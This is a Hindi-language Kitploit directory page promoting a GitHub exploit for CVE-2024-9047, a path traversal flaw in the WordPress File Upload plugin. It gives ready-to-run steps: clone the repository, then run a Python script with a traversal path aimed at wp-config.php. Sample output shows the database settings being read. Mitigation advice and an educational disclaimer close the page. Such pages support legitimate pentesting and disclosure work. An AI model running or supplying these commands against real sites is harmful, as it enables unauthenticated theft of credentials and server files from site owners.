Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nxploited/cve-2024-9047-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-9047-exploit

CVE-2024-9047-Exploit

वर्डप्रेस फ़ाइल अपलोड प्लगइन के लिए एक्सप्लॉइट - 4.24.11 तक के सभी संस्करण असुरक्षित हैं।

रिपॉजिटरी देखें
4121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-9047: वर्डप्रेस फ़ाइल अपलोड प्लगइन के लिए एक्सप्लॉइट

विवरण

वर्डप्रेस फ़ाइल अपलोड प्लगइन, WordPress के लिए, 4.24.11 तक (और इसमें शामिल) सभी संस्करणों में wfu_file_downloader.php फ़ाइल के माध्यम से पाथ ट्रैवर्सल भेद्यता के प्रति संवेदनशील है। यह भेद्यता अनधिकृत हमलावरों को इच्छित निर्देशिका के बाहर फ़ाइलों को पढ़ने या हटाने की अनुमति देती है। सफल शोषण के लिए लक्षित WordPress इंस्टॉलेशन पर PHP 7.4 या उससे पहले का संस्करण चल रहा होना आवश्यक है।

प्रभाव

  • गंभीरता: क्रिटिकल
  • CVSS स्कोर: 9.8 (क्रिटिकल)
  • हमले का वेक्टर: नेटवर्क
  • प्रमाणीकरण आवश्यक: नहीं

शोषण

एक हमलावर इस भेद्यता का शोषण करने के लिए कमजोर एंडपॉइंट wfu_file_downloader.php पर एक विशिष्ट अनुरोध तैयार कर सकता है और सर्वर पर संवेदनशील फ़ाइलों तक अनधिकृत पहुंच प्राप्त करने के लिए फ़ाइल पथ पैरामीटर में हेरफेर कर सकता है।


एक्सप्लॉइट विवरण

आवश्यकताएँ

  • लक्षित WordPress इंस्टॉलेशन में कमजोर प्लगइन (4.24.11 या उससे पहले) स्थापित होना चाहिए।
  • सर्वर पर PHP संस्करण 7.4 या उससे पहले चलना चाहिए।

शोषण के चरण

  1. इस रिपॉजिटरी को क्लोन करें:

    git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
    
  2. Python निर्भरताएँ स्थापित करें (यदि आवश्यक हो):

    pip install requests
    
  3. प्लगइन संस्करण की जाँच करने और भेद्यता का शोषण करने के लिए स्क्रिप्ट चलाएँ:

    python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
    

उदाहरण उपयोग

डिफ़ॉल्ट कमजोर कॉन्फ़िगरेशन का शोषण करने और WordPress कॉन्फ़िगरेशन फ़ाइल पढ़ने के लिए:

python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

परिणाम

C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


शमन

अपनी WordPress साइट को सुरक्षित रखने के लिए:

  1. वर्डप्रेस फ़ाइल अपलोड प्लगइन को नवीनतम संस्करण में अपडेट करें।
  2. सुनिश्चित करें कि PHP संस्करण एक समर्थित संस्करण (7.4 से ऊपर) में अपडेट किया गया है।
  3. संवेदनशील फ़ाइलों तक अनधिकृत पहुंच को रोकने के लिए फ़ाइल अनुमतियों को प्रतिबंधित करें।
  4. दुर्भावनापूर्ण अनुरोधों को ब्लॉक करने के लिए वेब एप्लिकेशन फ़ायरवॉल (WAF) का उपयोग करें।

अस्वीकरण

यह कोड केवल शैक्षिक और शोध उद्देश्यों के लिए है। इस स्क्रिप्ट का अनधिकृत उपयोग उन सिस्टमों पर जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। लेखक इस कोड के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।

टूल डाउनलोड करें